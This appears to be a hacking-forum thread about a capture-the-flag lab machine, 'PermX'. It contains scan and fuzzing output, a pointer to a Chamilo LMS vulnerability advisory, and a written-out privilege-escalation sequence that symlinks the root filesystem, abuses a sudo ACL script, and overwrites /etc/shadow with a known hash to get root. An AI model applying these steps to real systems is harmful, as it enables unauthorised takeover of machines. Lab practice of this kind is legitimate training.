[Art10n]

New Linux Machine - Easy PermX

https://pbs.twimg.com/media/GRtn_V5bQAAT...name=small

[xenom]

22/tcp open  ssh    OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|  256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_  256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: eLEARNING
|_http-server-header: Apache/2.4.52 (Ubuntu)

[Art10n]

$ ffuf -w /opt/useful/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://permx.htb -H 'Host: FUZZ.permx.htb' -fw 18
lms                    [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 43ms]
www                    [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 788ms]

$ whatweb lms.permx.htb
http://lms.permx.htb [200 OK] Apache[2.4.52], Bootstrap, Chamilo[1], Cookies[GotoCourse,ch_sid], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)], HttpOnly[GotoCourse,ch_sid], IP[10.129.253.78], JQuery, MetaGenerator[Chamilo 1], Modernizr, PasswordField[password], PoweredBy[Chamilo], Script, Title[PermX - LMS - Portal], X-Powered-By[Chamilo 1], X-UA-Compatible[IE=edge]

Powerred by Chamilo ---> https://starlabs.sg/advisories/23/23-4220/

[imassxck]

db pass in
/var/www/chamilo/app/config/configuration.php

[nomx1337]

sudo -l for root

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[Art10n]

how fast can you get the password from hash?

[a44857437]

mtz@permx:~$ ln -s /root/root.txt root1.txt
mtz@permx:~$ sudo /opt/acl.sh mtz rwx /home/mtz/root1.txt
setfacl: /home/mtz/root1.txt: Operation not permitted


why ??

Because you don't have permissions to list the contents of the /root directory I think

[osamy7593]

guys cd /home/mtz
ln -s / root
sudo /opt/acl.sh mtz rwx /home/mtz/root/etc/shadow

after that overwrite /etc/shadow

echo 'root:$y$j9T$RUjBgvOODKC9hyu5u7zCt0$Vf7nqZ4umh3s1N69EeoQ4N5zoid6c2SlGb1LvBFRxSB:19742:0:99999:7:::
daemon:*:19579:0:99999:7:::
bin:*:19579:0:99999:7:::
sys:*:19579:0:99999:7:::
sync:*:19579:0:99999:7:::
games:*:19579:0:99999:7:::
man:*:19579:0:99999:7:::
lp:*:19579:0:99999:7:::
mail:*:19579:0:99999:7:::
news:*:19579:0:99999:7:::
uucp:*:19579:0:99999:7:::
proxy:*:19579:0:99999:7:::
www-data:*:19579:0:99999:7:::
backup:*:19579:0:99999:7:::
list:*:19579:0:99999:7:::
irc:*:19579:0:99999:7:::
gnats:*:19579:0:99999:7:::
nobody:*:19579:0:99999:7:::
_apt:*:19579:0:99999:7:::
systemd-network:*:19579:0:99999:7:::
systemd-resolve:*:19579:0:99999:7:::
messagebus:*:19579:0:99999:7:::
systemd-timesync:*:19579:0:99999:7:::
pollinate:*:19579:0:99999:7:::
sshd:*:19579:0:99999:7:::
syslog:*:19579:0:99999:7:::
uuidd:*:19579:0:99999:7:::
tcpdump:*:19579:0:99999:7:::
tss:*:19579:0:99999:7:::
landscape:*:19579:0:99999:7:::
fwupd-refresh:*:19579:0:99999:7:::
usbmux:*:19742:0:99999:7:::
mtz:$y$j9T$RUjBgvOODKC9hyu5u7zCt0$Vf7nqZ4umh3s1N69EeoQ4N5zoid6c2SlGb1LvBFRxSB:19742:0:99999:7:::
lxd:!:19742::::::
mysql:!:19742:0:99999:7:::' > /etc/shadow

su root
password : 03F6lY3uXAP2bkW8

cat /root/root.txt

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[hacker234324]

New Linux Machine - Easy PermX

https://pbs.twimg.com/media/GRtn_V5bQAAT...name=small

thank youuuuuuuuuuuuuuuuuuuuu

[shadow0exe13]

how did u get the password for lms